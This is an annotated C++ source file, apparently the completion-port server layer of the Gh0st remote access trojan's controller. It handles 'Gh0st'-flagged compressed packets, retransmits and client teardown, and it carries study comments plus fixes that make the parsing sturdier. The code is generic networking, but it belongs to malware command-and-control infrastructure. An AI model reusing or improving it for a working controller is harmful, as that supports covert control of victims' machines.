///首先,待发送的数据是在参数:lpData中,而待发送的数据的大小由参数:nSize指定。/
// Queues data for transmission. The payload is zlib-compressed and framed
// as: 5-byte flag + 4-byte total packet size + 4-byte uncompressed size +
// compressed bytes. A copy of the raw payload is kept in
// m_ResendWriteBuffer so the peer can request a retransmit. Calling with
// nSize == 0 emits the bare packet flag, which the peer interprets as a
// retransmit request. The actual WSASend happens in OnClientWriting after
// the queued IOWrite completion is dequeued.
void CIOCPServer::Send(ClientContext* pContext, LPBYTE lpData, UINT nSize)
{
if (pContext == NULL)// nothing to send to
return;
try
{
if (nSize > 0)
{
// Compress data
// Worst-case compressed size: input * 1.001 + 12 bytes of zlib
// overhead - the scratch buffer must be at least this large.
unsigned long destLen = (double)nSize * 1.001 + 12;
LPBYTE pDest = new BYTE[destLen];
int nRet = compress(pDest, &destLen, lpData, nSize);// destLen comes back as the actual compressed size
if (nRet != Z_OK)// compression failed - drop the send silently
{
delete [] pDest;
return;
}
//
// Assemble the outgoing frame in the write buffer:
// flag + total length + uncompressed length + compressed payload.
LONG nBufLen = destLen + HDR_SIZE;
// 5 bytes packet flag
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
// 4 byte header [Size of Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nBufLen, sizeof(nBufLen));
// 4 byte header [Size of UnCompress Entire Packet]
pContext->m_WriteBuffer.Write((PBYTE) &nSize, sizeof(nSize));
// Write Data
pContext->m_WriteBuffer.Write(pDest, destLen);
delete [] pDest;
// Back up the ORIGINAL payload only after queuing it, because the
// resend buffer itself may be the data currently being sent.
LPBYTE lpResendWriteBuffer = new BYTE[nSize];
CopyMemory(lpResendWriteBuffer, lpData, nSize);
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(lpResendWriteBuffer, nSize); // keep a retransmit copy
delete [] lpResendWriteBuffer;
}
else // retransmit request
{ // Send only the packet flag: the peer recognises a flag-only frame
// as "please resend your last buffered payload".
pContext->m_WriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag));
pContext->m_ResendWriteBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.Write(m_bPacketFlag, sizeof(m_bPacketFlag)); // back up the flag-only frame too
}
// Wait for Data Ready signal to become available
// Serialise sends: block until the previous write fully completed.
WaitForSingleObject(pContext->m_hWriteComplete, INFINITE);
// Prepare Packet
// pContext->m_wsaOutBuffer.buf = (CHAR*) new BYTE[nSize];
// pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
// Queue an IOWrite completion with 0 bytes transferred; the worker
// dispatches it to OnClientWriting, which performs the WSASend.
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) pContext, &pOverlap->m_ol);
pContext->m_nMsgOut++;
}catch(...){}
}
//
// FUNCTION: CClientListener::OnClientInitializing
//
// DESCRIPTION: Called when client is initailizing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
///从此函数可以看出初始化连接的时候什么都没做直接返回true/
// Hook for the IOInitialize completion queued in OnAccept(). Intentionally
// a no-op: returning true simply tells the dispatcher the connection is
// ready for its first read. A greeting packet could be sent from here via
// Send() if the protocol ever needs one.
bool CIOCPServer::OnClientInitializing(ClientContext* pContext, DWORD dwIoSize)
{
return true; // make sure to issue a read after this
}
//
// FUNCTION: CIOCPServer::OnClientReading
//
// DESCRIPTION: Called when client is reading
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
// Handles an IORead completion: accumulates raw bytes, validates the
// 'Gh0st' framing, decompresses each complete packet and notifies the
// owner. A flag-only packet from the peer triggers a retransmit of the
// buffered payload; any framing/decompression error drops the partial
// stream and asks the peer to resend.
bool CIOCPServer::OnClientReading(ClientContext* pContext, DWORD dwIoSize)
{
CLock cs(CIOCPServer::m_cs, "OnClientReading");
try
{
// Rolling 1-second inbound-throughput sample. The statics persist
// across calls: nBytes accumulates until a second has elapsed, then the
// total is published to m_nRecvKbps and both counters reset.
static DWORD nLastTick = GetTickCount();
static DWORD nBytes = 0;
nBytes += dwIoSize;
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nRecvKbps), nBytes);
nBytes = 0;
}
// A zero-byte completion means the peer closed or the link failed:
// reap the connection with an abortive close.
if (dwIoSize == 0)
{
RemoveStaleClient(pContext, FALSE);
return false;
}
// A packet that is exactly the 5-byte flag is the peer requesting a
// retransmit of the last payload we backed up.
if (dwIoSize == FLAG_SIZE && memcmp(pContext->m_byInBuffer, m_bPacketFlag, FLAG_SIZE) == 0)
{
// resend the backed-up payload
Send(pContext, pContext->m_ResendWriteBuffer.GetBuffer(), pContext->m_ResendWriteBuffer.GetBufferLen());
// keep the read pipeline primed
PostRecv(pContext);
return true;
}
// Append this chunk; the stream may hold a partial packet, one packet,
// or several packets plus a trailing fragment.
pContext->m_CompressionBuffer.Write(pContext->m_byInBuffer,dwIoSize);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE);
// Drain every complete packet currently buffered.
while (pContext->m_CompressionBuffer.GetBufferLen() > HDR_SIZE)
{
// Validate the 5-byte signature before trusting the header fields.
BYTE bPacketFlag[FLAG_SIZE];
CopyMemory(bPacketFlag, pContext->m_CompressionBuffer.GetBuffer(), sizeof(bPacketFlag));
if (memcmp(m_bPacketFlag, bPacketFlag, sizeof(m_bPacketFlag)) != 0)
throw "bad buffer";
int nSize = 0;
CopyMemory(&nSize, pContext->m_CompressionBuffer.GetBuffer(FLAG_SIZE), sizeof(int));
// FIX: nSize comes straight off the wire. The original divided by it
// unconditionally (integer division by zero on nSize == 0) and could
// derive a negative payload length below. Treat any value not larger
// than the header as a framing error.
if (nSize <= HDR_SIZE)
throw "bad buffer";
// Update Process Variable
pContext->m_nTransferProgress = pContext->m_CompressionBuffer.GetBufferLen() * 100 / nSize;
if (pContext->m_CompressionBuffer.GetBufferLen() >= nSize)
{
int nUnCompressLength = 0;
// Read off header
pContext->m_CompressionBuffer.Read((PBYTE) bPacketFlag, sizeof(bPacketFlag));
pContext->m_CompressionBuffer.Read((PBYTE) &nSize, sizeof(int));
pContext->m_CompressionBuffer.Read((PBYTE) &nUnCompressLength, sizeof(int));
// Extract and decompress the payload into the decompression buffer.
// NOTE(review): nUnCompressLength is also wire-controlled and drives
// an unbounded allocation - consider a protocol-level cap.
int nCompressLength = nSize - HDR_SIZE;
PBYTE pData = new BYTE[nCompressLength];
PBYTE pDeCompressionData = new BYTE[nUnCompressLength];
if (pData == NULL || pDeCompressionData == NULL)
throw "bad Allocate";
pContext->m_CompressionBuffer.Read(pData, nCompressLength);
unsigned long destLen = nUnCompressLength;
int nRet = uncompress(pDeCompressionData, &destLen, pData, nCompressLength);
if (nRet == Z_OK)
{
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.Write(pDeCompressionData, destLen);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_RECEIVE_COMPLETE);
}
// FIX: free the work buffers before propagating a decompression
// failure - the original threw first and leaked both allocations.
delete [] pData;
delete [] pDeCompressionData;
if (nRet != Z_OK)
throw "bad buffer";
pContext->m_nMsgIn++;
}
else
break;// only a partial packet so far - wait for more data
}
// Post to WSARecv Next
PostRecv(pContext);
}catch(...)
{
// Any framing/decompression problem: drop the partial stream and ask
// the peer to resend (Send with nSize == 0 emits the bare flag).
pContext->m_CompressionBuffer.ClearBuffer();
Send(pContext, NULL, 0);
PostRecv(pContext);
}
return true;
}
//
// FUNCTION: CIOCPServer::OnClientWriting
//
// DESCRIPTION: Called when client is writing
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
// Ulf Hedlund 09062001 Changes for OVERLAPPEDPLUS
// Handles an IOWrite completion. The first completion for a frame is the
// zero-byte one queued by Send(); it falls through to the else branch and
// issues the real WSASend. When that send later completes, the written
// bytes are trimmed from the buffer and m_hWriteComplete is signalled once
// the buffer drains, unblocking the next Send().
bool CIOCPServer::OnClientWriting(ClientContext* pContext, DWORD dwIoSize)
{
try
{
// Rolling 1-second outbound-throughput sample (same static-counter
// technique as OnClientReading).
static DWORD nLastTick = GetTickCount();
static DWORD nBytes = 0;
nBytes += dwIoSize;
if (GetTickCount() - nLastTick >= 1000)
{
nLastTick = GetTickCount();
InterlockedExchange((LPLONG)&(m_nSendKbps), nBytes);
nBytes = 0;
}
//
ULONG ulFlags = MSG_PARTIAL;
// Finished writing - tidy up
pContext->m_WriteBuffer.Delete(dwIoSize);// drop bytes already on the wire (no-op for the initial dwIoSize == 0)
if (pContext->m_WriteBuffer.GetBufferLen() == 0)
{
pContext->m_WriteBuffer.ClearBuffer();
// Write complete
SetEvent(pContext->m_hWriteComplete);// unblock the next Send()
return true; // issue new read after this one
}
else
{
OVERLAPPEDPLUS * pOverlap = new OVERLAPPEDPLUS(IOWrite);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_TRANSMIT);
pContext->m_wsaOutBuffer.buf = (char*) pContext->m_WriteBuffer.GetBuffer();
pContext->m_wsaOutBuffer.len = pContext->m_WriteBuffer.GetBufferLen();
// Send the remaining buffered bytes; normally completes asynchronously
// unless the peer has dropped.
int nRetVal = WSASend(pContext->m_Socket,
&pContext->m_wsaOutBuffer,
1,
&pContext->m_wsaOutBuffer.len,
ulFlags,
&pOverlap->m_ol,
NULL);
if ( nRetVal == SOCKET_ERROR && WSAGetLastError() != WSA_IO_PENDING )
{
RemoveStaleClient( pContext, FALSE );// hard failure - reap the connection
}
}
}catch(...){}
return false; // issue new read after this one
}
//
// FUNCTION: CIOCPServer::CloseCompletionPort
//
// DESCRIPTION: Close down the IO Complete Port, queue and associated client context structs
// which in turn will close the sockets...
//
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Drains the worker pool: repeatedly posts a NULL-key completion to wake
// any blocked worker (which then observes m_bTimeToKill and exits), waits
// for m_nWorkerCnt to reach zero, closes the port and recycles every
// remaining client context.
void CIOCPServer::CloseCompletionPort()
{
while (m_nWorkerCnt)// workers decrement this as they exit (ThreadPoolFunc)
{
PostQueuedCompletionStatus(m_hCompletionPort, 0, (DWORD) NULL, NULL);// wake a blocked worker
Sleep(100);// give it time to dequeue and exit
}
// Close the CompletionPort and stop any more requests
CloseHandle(m_hCompletionPort);
ClientContext* pContext = NULL;
do
{
POSITION pos = m_listContexts.GetHeadPosition();// re-read the head each pass: RemoveStaleClient mutates the list
if (pos)
{
pContext = m_listContexts.GetNext(pos); // take the front context and recycle it
RemoveStaleClient(pContext, FALSE);
}
}
while (!m_listContexts.IsEmpty());// until every context is recycled
m_listContexts.RemoveAll();// defensive: the list should already be empty
}
/*实现完成端口与套接字的绑定,并返回完成端口*/
// Binds 'socket' to 'hCompletionPort' with 'dwCompletionKey' as the
// per-connection completion key. Returns TRUE when the association
// succeeded (CreateIoCompletionPort hands back the existing port handle).
BOOL CIOCPServer::AssociateSocketWithCompletionPort(SOCKET socket, HANDLE hCompletionPort, DWORD dwCompletionKey)
{
const HANDLE hPort = CreateIoCompletionPort((HANDLE) socket, hCompletionPort, dwCompletionKey, 0);
return (hPort == hCompletionPort) ? TRUE : FALSE;
}
//
// FUNCTION: CIOCPServer::RemoveStaleClient
//
// DESCRIPTION: Client has died on us, close socket and remove context from our list
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Tears down a dead or unwanted client connection. bGraceful == FALSE sets
// SO_LINGER with a zero timeout so closesocket() aborts the connection
// immediately (pending data discarded, peer sees a reset); TRUE keeps the
// default graceful close. The context is then recycled to the free pool.
void CIOCPServer::RemoveStaleClient(ClientContext* pContext, BOOL bGraceful)
{
CLock cs(m_cs, "RemoveStaleClient");// protects the shared context lists
TRACE("CIOCPServer::RemoveStaleClient\n");
LINGER lingerStruct;
//
// If we're supposed to abort the connection, set the linger value
// on the socket to 0.
//
// (l_onoff=1 with l_linger=0 forces a hard close: unsent data is dropped
// instead of lingering to flush it after closesocket().)
if ( !bGraceful )
{
lingerStruct.l_onoff = 1;
lingerStruct.l_linger = 0;
setsockopt( pContext->m_Socket, SOL_SOCKET, SO_LINGER,
(char *)&lingerStruct, sizeof(lingerStruct) );
}
//
// Free context structures
// Only act if the context is still on the active list (avoids double removal).
if (m_listContexts.Find(pContext))
{
//
// Now close the socket handle. This will do an abortive or graceful close, as requested.
CancelIo((HANDLE) pContext->m_Socket);// cancel pending overlapped IO on this socket
closesocket( pContext->m_Socket );
pContext->m_Socket = INVALID_SOCKET;// mark the socket as gone
while (!HasOverlappedIoCompleted((LPOVERLAPPED)pContext)) // spin until outstanding IO drains; NOTE(review): casts the context itself to OVERLAPPED - assumes the OVERLAPPED member sits at offset 0, confirm
Sleep(0);
m_pNotifyProc((LPVOID) m_pFrame, pContext, NC_CLIENT_DISCONNECT);// lets the UI drop this host from its list
MoveToFreePool(pContext);// recycle the context for reuse
}
}
// Orderly shutdown: stops the listener thread, closes the listen socket and
// accept event, drains/closes the completion port, then frees the pooled
// contexts. Idempotent: m_bInit is cleared first so repeat calls no-op.
void CIOCPServer::Shutdown()
{
if (m_bInit == false)// never initialised (or already shut down)
return;
m_bInit = false;
m_bTimeToKill = true;// tell the worker threads to exit
// Stop the listener
Stop();
closesocket(m_socListen); // release the listen socket and accept event
WSACloseEvent(m_hEvent);
CloseCompletionPort();// waits for workers, closes the port, recycles contexts
DeleteCriticalSection(&m_cs);
while (!m_listFreePool.IsEmpty())// free every pooled context
delete m_listFreePool.RemoveTail();
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Checks free pool otherwise allocates a context
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Moves a context from the active list to the free pool after clearing all
// of its IO buffers, so AllocateContext() can hand it out again.
void CIOCPServer::MoveToFreePool(ClientContext *pContext)
{
CLock cs(m_cs, "MoveToFreePool");// protects both lists
// Free context structures
POSITION pos = m_listContexts.Find(pContext);// locate the context on the active list
if (pos)
{
// Scrub all buffered data before the context is reused.
pContext->m_CompressionBuffer.ClearBuffer();
pContext->m_WriteBuffer.ClearBuffer();
pContext->m_DeCompressionBuffer.ClearBuffer();
pContext->m_ResendWriteBuffer.ClearBuffer();
// Park it on the free pool...
m_listFreePool.AddTail(pContext);
// ...and drop it from the active list.
m_listContexts.RemoveAt(pos);
}
}
//
// FUNCTION: CIOCPServer::MoveToFreePool
//
// DESCRIPTION: Moves an 'used/stale' Context to the free pool for reuse
//
// INPUTS:
//
// NOTES:
//
// MODIFICATIONS:
//
// Name Date Version Comments
// N T ALMOND 06042001 1.0 Origin
//
// Called after a host connects successfully; returns a pointer to a (recycled or newly allocated) ClientContext.
// Hands out a ClientContext for a new connection, preferring a recycled
// entry from the free pool over a fresh heap allocation. The returned
// context is fully zeroed before use.
ClientContext* CIOCPServer::AllocateContext()
{
CLock cs(CIOCPServer::m_cs, "AllocateContext");
ClientContext* pNewContext = m_listFreePool.IsEmpty()
? new ClientContext
: m_listFreePool.RemoveHead();
ASSERT(pNewContext);
if (pNewContext != NULL)
{
// Wipe the whole structure, then re-establish the fields that must
// start from a known value.
ZeroMemory(pNewContext, sizeof(ClientContext));
pNewContext->m_bIsMainSocket = false;
memset(pNewContext->m_Dialog, 0, sizeof(pNewContext->m_Dialog));
}
return pNewContext;
}
//重新连接前需要移除他的链表,不中止SOKET连接
// Removes the given context from the active list ahead of a reconnect,
// shutting its socket down gracefully (bGraceful == TRUE).
void CIOCPServer::ResetConnection(ClientContext* pContext)
{
CString strHost;
ClientContext* pCompContext = NULL;
CLock cs(CIOCPServer::m_cs, "ResetConnection");
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pCompContext = m_listContexts.GetNext(pos);
if (pCompContext == pContext)// found the matching connection
{
RemoveStaleClient(pContext, TRUE);// graceful removal
break;
}
}
}
// Gracefully removes every client on the active list. The sentinel is
// raised first so OnAccept() refuses new connections during the teardown.
void CIOCPServer::DisconnectAll()
{
m_bDisconnectAll = true;
CString strHost;
ClientContext* pContext = NULL;
CLock cs(CIOCPServer::m_cs, "DisconnectAll");
// Walk the active list, removing each context as we go.
POSITION pos = m_listContexts.GetHeadPosition();
while (pos)
{
pContext = m_listContexts.GetNext(pos);
RemoveStaleClient(pContext, TRUE);
}
m_bDisconnectAll = false;
}
//简单返回
// Returns whether Initialize() completed successfully (server is live).
bool CIOCPServer::IsRunning()
{
return m_bInit;
}
// Questions and corrections are welcome - the annotations reflect the original author's personal understanding.